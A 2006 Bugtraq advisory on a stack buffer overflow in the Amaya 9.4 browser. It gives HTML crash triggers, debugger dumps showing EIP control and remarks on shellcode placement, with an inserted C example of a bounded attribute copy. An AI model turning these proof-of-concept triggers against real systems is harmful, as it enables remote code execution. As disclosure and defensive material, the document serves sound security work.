[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4
From: bugtraq () morph3us org
Date: 12 Apr 2006 23:31:32 -0000

| BuHa Security-Advisory #10    |    Apr 12th, 2006 |
| Vendor   | W3C's Amaya                            |
| URL      | http://www.w3.org/Amaya/               |
| Version  | <= 9.4                                 |
| Risk     | Critical (Remote Code Execution)       |

o Description:

The current release, Amaya 9.5, is available for Linux, Windows and
now MacOS X. It supports HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1,
HTTP 1.1, MathML 2.0, many CSS 2 features, and includes SVG support
(transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:

Either of the two code snippets posted below (in fact there are dozens
of possible snippets, but all of them trigger the same bug) forces
Amaya 9.4 to crash:
<colgroup compact="Ax200">
<textarea rows="Ax200">

After a first glance at the generated error report and at the ASM code
at the point of the access violation, I thought I had come across a
heap-based buffer overflow.

eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206

        004edd61 03f3             add     esi,ebx
        004edd63 a4               movsb
        004edd64 8b4500           mov     eax,[ebp]
        004edd67 8b8c241c010000   mov     ecx,[esp+0x11c]
        004edd6e 8b942418010000   mov     edx,[esp+0x118]
        004edd75 50               push    eax
        004edd76 51               push    ecx
        004edd77 53               push    ebx
        004edd78 52               push    edx
        004edd79 e8a23c0200       call    amaya+0x111a20 (00511a20)
        004edd7e 53               push    ebx
        004edd7f e83cf90000       call    amaya+0xfd6c0 (004fd6c0)
        004edd84 83c428           add     esp,0x28
        004edd87 8bbc24fc000000   mov     edi,[esp+0xfc]
        004edd8e 8b942400010000   mov     edx,[esp+0x100]
FAULT ->004edd95 8b4240           mov     eax,[edx+0x40]
        004edd98 83f844           cmp     eax,0x44
        004edd9b 0f8527030000     jne     amaya+0xee0c8 (004ee0c8)
        004edda1 837c242457       cmp     dword ptr [esp+0x24],0x57
        004edda6 0f8465060000     je      amaya+0xee411 (004ee411)
        004eddac 8b4500           mov     eax,[ebp]
        004eddaf 8b8c2408010000   mov     ecx,[esp+0x108]
        004eddb6 6aff             push    0xff
        004eddb8 50               push    eax
        004eddb9 51               push    ecx
        004eddba 57               push    edi
        004eddbb e8d33af1ff       call    amaya+0x1893 (00401893)
        004eddc0 83c410           add     esp,0x10
        004eddc3 5f               pop     edi
        004eddc4 5e               pop     esi
        004eddc5 5d               pop     ebp

After a second, more precise look, the supposed heap overflow turned
out to be a stack-based overflow.

We are able to control the EIP:
<textarea rows=

eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

Function: <nosymbols>
No prior disassembly possible
42424242 ?? ???
42424244 ?? ???
42424246 ?? ???
42424248 ?? ???
4242424a ?? ???
4242424c ?? ???


In fact, successful exploitation of this vulnerability is not that easy,
because non-text characters are modified during parsing; therefore you
have to find a place where to put the shellcode. Naturally you have to
avoid null bytes too, because Amaya would stop parsing the attribute
value and the overflow would not get triggered.
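As an added illustration of the bug class described above (hypothetical code written for this page, not Amaya's source and not from the advisory's author): an attribute value such as rows="..." is copied into a fixed-size stack buffer, and the copy is bounded so an over-long value is rejected rather than written past the frame. ATTR_MAX, the function names and the 200-byte test input are assumptions.

```c
/* Added illustration of the bug class in the advisory; hypothetical code,
 * not Amaya's. ATTR_MAX and the function names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ATTR_MAX 32   /* assumed size of the fixed stack buffer */

/* Bounded attribute-value copy. The unsafe form of this loop has no outsz
 * check: it copies until the closing quote (or a NUL, which is why the
 * advisory says null bytes end the attribute) into a fixed stack buffer,
 * so a 200-byte value overruns the frame. Here an over-long value returns 0
 * and the caller rejects the attribute instead of overflowing. */
static int copy_attr_safe(const char *p, char *out, size_t outsz)
{
    size_t n = 0;
    while (*p && *p != '"') {
        if (n + 1 >= outsz)          /* leave room for the terminator */
            return 0;
        out[n++] = *p++;
    }
    out[n] = '\0';
    return 1;
}

/* Parses rows="..." from a tag; returns -1 if absent or over-long. */
int rows_from_tag(const char *tag)
{
    char buf[ATTR_MAX];
    const char *p = strstr(tag, "rows=\"");
    if (!p || !copy_attr_safe(p + 6, buf, sizeof buf))
        return -1;
    return atoi(buf);
}

/* Constructed input in the advisory's style: rows="A" repeated 200 times. */
const char *constructed_long_tag(void)
{
    static char tag[256] = "<textarea rows=\"";
    memset(tag + 16, 'A', 200);
    memcpy(tag + 216, "\">", 3);
    return tag;
}

int main(void)
{
    printf("%d %d\n", rows_from_tag("<textarea rows=\"10\">"),
           rows_from_tag(constructed_long_tag()));   /* prints 10 -1 */
    return 0;
}
```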

o Disclosure Timeline:

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:

Upgrade to the latest version of Amaya. [2]

o Credits:

Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq () morph3us org' is more a
spam address than a regular mail address; therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html
